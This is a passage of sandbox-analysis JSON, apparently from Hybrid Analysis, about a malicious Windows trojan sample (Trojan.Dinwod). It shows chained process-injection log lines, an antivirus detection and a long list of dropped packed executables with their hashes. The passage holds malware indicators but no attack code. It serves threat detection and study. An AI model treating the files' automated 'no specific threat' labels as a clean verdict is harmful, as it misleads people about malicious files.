process \"C:\\68804.exe\" (Handle: 116)\n \"vnxlf.exe\" wrote 4 bytes to a remote process \"C:\\68804.exe\" (Handle: 116)\n \"68804.exe\" wrote 32 bytes to a remote process \"C:\\264608.exe\" (Handle: 68)\n \"68804.exe\" wrote 52 bytes to a remote process \"C:\\264608.exe\" (Handle: 68)\n \"68804.exe\" wrote 4 bytes to a remote process \"C:\\264608.exe\" (Handle: 68)\n \"264608.exe\" wrote 32 bytes to a remote process \"C:\\hbxvf.exe\" (Handle: 116)\n \"264608.exe\" wrote 52 bytes to a remote process \"C:\\hbxvf.exe\" (Handle: 116)\n \"264608.exe\" wrote 4 bytes to a remote process \"C:\\hbxvf.exe\" (Handle: 116)\n \"hbxvf.exe\" wrote 32 bytes to a remote process \"C:\\djhdv.exe\" (Handle: 68)\n \"hbxvf.exe\" wrote 52 bytes to a remote process \"C:\\djhdv.exe\" (Handle: 68)\n \"hbxvf.exe\" wrote 4 bytes to a remote process \"C:\\djhdv.exe\" (Handle: 68)\n \"djhdv.exe\" wrote 32 bytes to a remote process \"C:\\vvlhl.exe\" (Handle: 68)\n \"djhdv.exe\" wrote 52 bytes to a remote process \"C:\\vvlhl.exe\" (Handle: 68)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c
https://hybrid-analysis.com/sample/7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c
Hybrid Analysis - Infostealers
{"size": 343771, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "submit_name": "7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c", "sha256": "7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c", "av_detect": 96, "vx_family": "Trojan.Dinwod", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "The operation completed successfully. (0x0)", "total_processes": 64, "total_signatures": 110, "extracted_files": [{"name": "0400068.exe", "file_path": "C:\\0400068.exe", "file_size": 344319, "sha256": "189e174836c97b8cbef4073d2a5f290af8460836dee97a4434abfa6a0175e80c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "0400068.exe (PID: 2192)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "08622.exe", "file_path": "C:\\08622.exe", "file_size": 344331, "sha256": "667686731e5f37fef92b56538b8471f142636c813565f58ba23e003dc0ceb41a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "08622.exe (PID: 2744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2046660.exe", "file_path": "C:\\2046660.exe", "file_size": 344011, "sha256": "66a8261199e3c9ced617c09afc89e23fa82378d9de85d1399f66b6a6dffc3cf5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bfbfxx.exe (PID: 3812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "20484.exe", "file_path": "C:\\20484.exe", "file_size": 343880, "sha256": "5d03d8c2c01506f7e5c3ab0287311c54a3e8890f8aad9afec3ec633e1708a220", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4262848.exe (PID: 5936)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "226242.exe", "file_path": "C:\\226242.exe", "file_size": 343814, "sha256": "d77e0416edcbdaae9ba7e6170cadddc1c9d3b79a653b86ecc5962e5dbe80b6cd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "26224.exe (PID: 5968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "24808.exe", "file_path": "C:\\24808.exe", "file_size": 344344, "sha256": "7a6a37fb9c8a8d4bf278ce4eca23408dab257f64de53592b3bd9873c4a2393d6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "08622.exe (PID: 2744)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "24826.exe", "file_path": "C:\\24826.exe", "file_size": 344168, "sha256": "ae1ed7e349bab92119b248bb9430cea0be45e0c77455e74cadda7f08881ae66e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "24826.exe (PID: 2412)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "26224.exe", "file_path": "C:\\26224.exe", "file_size": 343800, "sha256": "c23b022c5ecdbfddf0eac6545acf1d7b62dd4b2d39e72e3cdeef9c7058bbf2a3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4822004.exe (PID: 6044)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4022682.exe", "file_path": "C:\\4022682.exe", "file_size": 344211, "sha256": "69e432bca7f93fc2bac06cfc834b5bfcc1fc748199d2c4713b0ac5a69b64a5c8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4022682.exe (PID: 2736)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "40484.exe", "file_path": "C:\\40484.exe", "file_size": 344027, "sha256": "5633c21161a77a526bca49cb89a0a4812d692ff40d61bc9abb3d938ee8c1a3bd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "2046660.exe (PID: 3748)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4262848.exe", "file_path": "C:\\4262848.exe", "file_size": 343867, "sha256": "97f97ee1d7077e9522d85c5b72edd3b00d2dc3987ddb08b47fcb2e5941d22ac1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4262848.exe (PID: 5936)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4622600.exe", "file_path": "C:\\4622600.exe", "file_size": 344307, "sha256": "b122d316173326d01dca8b850c8bb8e0b78b674261899b62d00513637af79f88", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tnxhl.exe (PID: 2308)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "48080.exe", "file_path": "C:\\48080.exe", "file_size": 344580, "sha256": "ca2897a97728904cf024107dc3f068e94be00ca9ec312594b5d982cf7819127c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "48080.exe (PID: 1004)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4822004.exe", "file_path": "C:\\4822004.exe", "file_size": 343782, "sha256": "f3d02ec9689a591c6b753fef93cf0359afc9ee976ab3aa9fd86c064d583f2fec", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "4822004.exe (PID: 6044)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "484648.exe", "file_path": "C:\\484648.exe", "file_size": 343852, "sha256": "40e2431f25b2cf4d39fa5b075e1de0b3d3b26a02f30ae5588ce679164d8d92e2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8402624.exe (PID: 5928)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "60202.exe", "file_path": "C:\\60202.exe", "file_size": 344128, "sha256": "6e5d6bd7347ffb50598953fb77d7495b247e9f7849aea4f776f83e9aea0ffcd7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tplfhb.exe (PID: 4280)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6244848.exe", "file_path": "C:\\6244848.exe", "file_size": 344221, "sha256": "9957ec24c06b8edad1352bf5f3edb7dd2cab2df383bd73d9be4451d928fe2082", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6244848.exe (PID: 4072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "626080.exe", "file_path": "C:\\626080.exe", "file_size": 344596, "sha256": "2e0bfee4b801590c2c1eeff5b16ae0b7760788dbcd8932f1b45a4001ae36614e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "48080.exe (PID: 1004)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6260866.exe", "file_path": "C:\\6260866.exe", "file_size": 344138, "sha256": "48ec4418b1d905de662afa0a9ea4443950e80dcd1bac7fac074841ddc9ff48b6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6260866.exe (PID: 4508)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6686484.exe", "file_path": "C:\\6686484.exe", "file_size": 344152, "sha256": "b546e6418dcf20d4c1e924d509c34117d776d263c20f7d62d64335b673ac1be3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6260866.exe (PID: 4508)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "806288.exe", "file_path": "C:\\806288.exe", "file_size": 343898, "sha256": "5f5a30d6f22a469941c3c33608acd4f034e8c7327cc9ae7d7d280b28a9f72996", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "806288.exe (PID: 4216)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "840000.exe", "file_path": "C:\\840000.exe", "file_size": 344613, "sha256": "efd11ffb69bc7ac9301a46b183e03dc0b4b9ced53a01f7427c0bc8dcbbe60045", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "626080.exe (PID: 3920)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "8402624.exe", "file_path": "C:\\8402624.exe", "file_size": 343832, "sha256": "82527f6c752d5029f3479147176586828fec0c35d4a7faf204eccceffd5aaac6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "8402624.exe (PID: 5928)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "880446.exe", "file_path": "C:\\880446.exe", "file_size": 344354, "sha256": "74dd6abc0baf458c0a9e828c7560ed37726b27aabca674d8a25841b6bd303893", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "880446.exe (PID: 1444)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bfbfxx.exe", "file_path": "C:\\bfbfxx.exe", "file_size": 343999, "sha256": "877865045d6a626f4148843aae1ba579683c2825bc8d7fce5bd8267afd4a1fb6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bfbfxx.exe (PID: 3812)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bjvtfxj.exe", "file_path": "C:\\bjvtfxj.exe", "file_size": 344245, "sha256": "4d0c9fea75d512c11531bd81f3ceff06d5c3c7cdf38fdcadc1015f7af747bdff", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "rfbfjv.exe (PID: 564)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bvrxv.exe", "file_path": "C:\\bvrxv.exe", "file_size": 344380, "sha256": "a54000899a0549b9592af11a7d3908b04946c807f145ff69a141e890e17cbb87", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bvrxv.exe (PID: 3180)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dlbjrj.exe", "file_path": "C:\\dlbjrj.exe", "file_size": 344627, "sha256": "4c37c659fad7c09aeb9da8a21559292a0c6afc48ccd907d8320e7edff26b7ce7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dlbjrj.exe (PID: 2524)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dvxnn.exe", "file_path": "C:\\dvxnn.exe", "file_size": 344657, "sha256": "0f6000766a34d2be7b35a0fd2512c7abbb1599d65e7b7f240fc20610109cca61", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "flflvfr.exe (PID: 2824)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "flflvfr.exe", "file_path": "C:\\flflvfr.exe", "file_size": 344638, "sha256": "5e6b5ec4d43a4cd47fba358c4f07fc28cc85921a89b585038a3fe5728500227e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "dlbjrj.exe (PID: 2524)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fnlpb.exe", "file_path": "C:\\fnlpb.exe", "file_size": 344688, "sha256": "43e19b41cdf9c04736c74cda52d04c2c6724fd6113757d620e6cb7589623a59a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nndlvj.exe (PID: 3600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fnnbp.exe", "file_path": "C:\\fnnbp.exe", "file_size": 344496, "sha256": "7eb621860d9061a9db81ee94575c29fb061529c82687e1508c3db28cdf785149", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "prxnx.exe (PID: 2556)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ftpltv.exe", "file_path": "C:\\ftpltv.exe", "file_size": 344369, "sha256": "80b413d6ffd63ba10c6c42c31a7497e6f6ca534efe8e3f9349c58a0116454b3b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "880446.exe (PID: 1444)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fvbll.exe", "file_path": "C:\\fvbll.exe", "file_size": 343940, "sha256": "8ee385762a3ca073fc14dcbd1e124fe61804782ee05ab93776f9f21f7780ee8a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vvvtjhp.exe (PID: 6124)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "fxbfvbf.exe", "file_path": "C:\\fxbfvbf.exe", "file_size": 344545, "sha256": "37ce8f5eba21dc2759d8fca3cd2b697055d49e20d9c061d8c23d2453f8a03728", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vjjxj.exe (PID: 900)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hltjhx.exe", "file_path": "C:\\hltjhx.exe", "file_size": 344707, "sha256": "92ac4b18090efcdf41338c25aa75485301339d84abf9b02b4915855033aa372d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hltjhx.exe (PID: 1424)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hnnnrvf.exe", "file_path": "C:\\hnnnrvf.exe", "file_size": 344440, "sha256": "d52c828460de7f0027cb244128cbdc54c3cc2ece7e31a7ef7328d434bb744653", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hnnnrvf.exe (PID: 1580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hpdphl.exe", "file_path": "C:\\hpdphl.exe", "file_size": 344183, "sha256": "5104791dd54fc8a9349978e3fea679287243c2ee22dd4200271d76a6c318c5d3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "24826.exe (PID: 2412)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hrrrr.exe", "file_path": "C:\\hrrrr.exe", "file_size": 343909, "sha256": "4f6562889e0ae257e984c9878c3b1c84ed17e60a45777588450f735e767b35cd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hrrrr.exe (PID: 6088)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jtjnrb.exe", "file_path": "C:\\jtjnrb.exe", "file_size": 344047, "sha256": "0df3de0355df07dd3da8ce5c051fbf7d806812ebd52e1676dfdeb05afdfe08c3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "40484.exe (PID: 1660)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jtlftjr.exe", "file_path": "C:\\jtlftjr.exe", "file_size": 344256, "sha256": "d62eb551b330df15fd94f6b06530f72c0c071da536d9d66df5460bbc0941b871", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bjvtfxj.exe (PID: 4228)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lbbnbl.exe", "file_path": "C:\\lbbnbl.exe", "file_size": 344393, "sha256": "1a4dae9905c0d7c0d9b589b27e10273f64d22f9efe60c9aad1ef1912d9445b50", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "bvrxv.exe (PID: 3180)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ljlpvrx.exe", "file_path": "C:\\ljlpvrx.exe", "file_size": 343988, "sha256": "2600830515e33ca513b179b987ca0f3918933a25ae70f8c483573df165a58593", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ljlpvrx.exe (PID: 6072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lpljbv.exe", "file_path": "C:\\lpljbv.exe", "file_size": 343953, "sha256": "6e81284f5cf8e9a707595f27213f10cba437d1e834d771f6eee2db4570c9f6b3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lpljbv.exe (PID: 4328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lrbtfbt.exe", "file_path": "C:\\lrbtfbt.exe", "file_size": 344276, "sha256": "dade952c141464d2f3f45da1095dbccc78c8e86ef6451edd1cf3b9c997c05bbf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lrbtfbt.exe (PID: 2040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ltbfnb.exe", "file_path": "C:\\ltbfnb.exe", "file_size": 344565, "sha256": "17f97d8de198d7a011d0773fa48068f74be65cb568ca28649cda47dc4390023e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "ltbfnb.exe (PID: 3952)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lxdxh.exe", "file_path": "C:\\lxdxh.exe", "file_size": 344726, "sha256": "87f6712677cb5438be2ae7f6f3092f240d600bab80a813e61c1b301df1742be0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hltjhx.exe (PID: 1424)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nndlvj.exe", "file_path": "C:\\nndlvj.exe", "file_size": 344674, "sha256": "0798718e08118ad3cb940aa0a036a6d033520f229ee73576c5c167e817d6bf88", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nndlvj.exe (PID: 3600)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nxlhfx.exe", "file_path": "C:\\nxlhfx.exe", "file_size": 344075, "sha256": "e99474fe90fd956c433bf5c4ba79a5c4021f84971d7abef8cd4e5ce53c01ad42", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nxlhfx.exe (PID: 2804)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pddnp.exe", "file_path": "C:\\pddnp.exe", "file_size": 344093, "sha256": "35dcfa5bf4fe5debad707ee747b3e66570869658c0dd1186f5fc02b1003d59c6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "nxlhfx.exe (PID: 2804)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "prxnx.exe", "file_path": "C:\\prxnx.exe", "file_size": 344478, "sha256": "9ea61a69772a674a4ee0af515b9c86a3e823b174da9f990eee5288f33298d3c8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "prxnx.exe (PID: 2556)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rfbfjv.exe", "file_path": "C:\\rfbfjv.exe", "file_size": 344233, "sha256": "d8cd5f37ec14a0d0dd8c7c5bddfca4c1d2b35fe194ebc05d4b119a12314c1bb6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "6244848.exe (PID: 4072)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rjldjr.exe", "file_path": "C:\\rjldjr.exe", "file_size": 343973, "sha256": "8084a466ce9016165ce1595bc124bd6da766bfcc682abb1ffb14890d65661a26", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lpljbv.exe (PID: 4328)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tjbjhtr.exe", "file_path": "C:\\tjbjhtr.exe", "file_size": 344465, "sha256": "f47196e5890d9e246f54a391ee075b9f2eefede62a12ff2636d860dc11515e5b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "tjttplv.exe (PID: 276)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tjttplv.exe", "file_path": "C:\\tjttplv.exe", "file_size": 344451, "sha256": "6a08670ad6eb7cd0ada327bbaac7a94d1fe76372deec5806e30b92be59881663", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hnnnrvf.exe (PID: 1580)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tnxhl.exe", "file_path": "C:\\tnxhl.exe", "file_size": 344290, "sha256": "261547412ed547dbf628a480d564734f05bc87c8cc2b9d12008339abd766af1c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "lrbtfbt.exe (PID: 2040)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tplfhb.exe", "file_path": "C:\\tplfhb.exe", "file_size": 344113, "sha256": "d65b713f5a02d346d0d719c0d670646e5a49cd48a04de13e04e17ca36b602dd9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "pddnp.exe (PID: 2380)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vfdxfvl.exe", "file_path": "C:\\vfdxfvl.exe", "file_size": 344193, "sha256": "ee03ebdcfa227c9e10c929b76600a9ba9b1fefd1d184a07b71a724fe8e559b05", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hpdphl.exe (PID: 3272)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vjjxj.exe", "file_path": "C:\\vjjxj.exe", "file_size": 344527, "sha256": "d6d221ccfccd2c436fffe2de0ef63c7ed778fd1ce706e1f3325dd44ad4fce9cf", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vpfhrjh.exe (PID: 4152)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vpfhrjh.exe", "file_path": "C:\\vpfhrjh.exe", "file_size": 344515, "sha256": "229d22f352f10599e64c99370849f0d5263075b594f659e075feada49d5f529e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vpfhrjh.exe (PID: 4152)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vvvtjhp.exe", "file_path": "C:\\vvvtjhp.exe", "file_size": 343920, "sha256": "41ab1afeaa1441073487831c09c588c74b7ff5839135220c71925ec60885e7bc", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "hrrrr.exe (PID: 6088)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vxdlrx.exe", "file_path": "C:\\vxdlrx.exe", "file_size": 344406, "sha256": "2753bffa547f702d7948aef724eaf3ec512e6b7140ca96a53ea427f261708722", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vxdlrx.exe (PID: 1876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xnvjvl.exe", "file_path": "C:\\xnvjvl.exe", "file_size": 344420, "sha256": "07c54da8875cf087ecf1d8991b536ffa39b3a3df9aaa41c271ae4e7d246f1a12", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "runtime_process": "vxdlrx.exe (PID: 1876)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "20406.exe", "file_size": 345023, "sha256": "5c73bf11f735d00fc74caea0c7502442cb8ce07b07d93f4349fa1096fc3366a1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "486604.exe", "file_size": 345012, "sha256": "be8ede34027dadccaa7a5dca52b9dae3bd0dab310de56feb70698369942c04f9", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2028060.exe", "file_size": 344996, "sha256": "49c6c557bab58c0fa6f6010d3ba40b92f824b06dd936cff82e384e72dccdd527", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dprdh.exe", "file_size": 344983, "sha256": "dd27fca249fb37dd6a27f83b1dc9e3c493577ba4d06eb0b64fb4539e63550a7e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "nfhppl.exe", "file_size": 344968, "sha256": "7f3edb57fb426040fd132cbd35e5953b62729a245dc35c2d33752ececce5b325", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4080282.exe", "file_size": 344954, "sha256": "85f0a5f9f43ac6823aa16e9e0114fbb4bf7a3c5f9343fb717df203b81e2a162b", 